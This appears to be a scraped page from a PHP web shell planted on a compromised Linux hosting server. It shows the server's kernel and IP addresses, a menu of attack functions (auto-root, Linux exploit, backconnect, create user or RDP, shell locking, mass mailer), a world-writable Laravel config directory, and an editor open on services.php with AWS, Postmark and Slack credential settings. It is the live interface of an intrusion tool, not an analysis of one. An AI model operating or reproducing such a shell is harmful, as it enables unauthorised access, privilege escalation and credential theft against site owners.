Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.69
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo22.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
4.18
KB
-rw-rw-rw-
auth.php
4.27
KB
-rw-rw-rw-
cache.php
3.36
KB
-rw-rw-rw-
database.php
5.95
KB
-rw-rw-rw-
filesystems.php
2.31
KB
-rw-rw-rw-
logging.php
4.21
KB
-rw-rw-rw-
mail.php
3.15
KB
-rw-rw-rw-
paypal.php
1.16
KB
-rw-rw-rw-
permission.php
6.93
KB
-rw-rw-rw-
queue.php
3.72
KB
-rw-rw-rw-
sanctum.php
3.03
KB
-rw-rw-rw-
services.php
973
B
-rw-rw-rw-
session.php
7.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'slack' => [ 'notifications' => [ 'bot_user_oauth_token' => env('SLACK_BOT_USER_OAUTH_TOKEN'), 'channel' => env('SLACK_BOT_USER_DEFAULT_CHANNEL'), ], ], ];
Close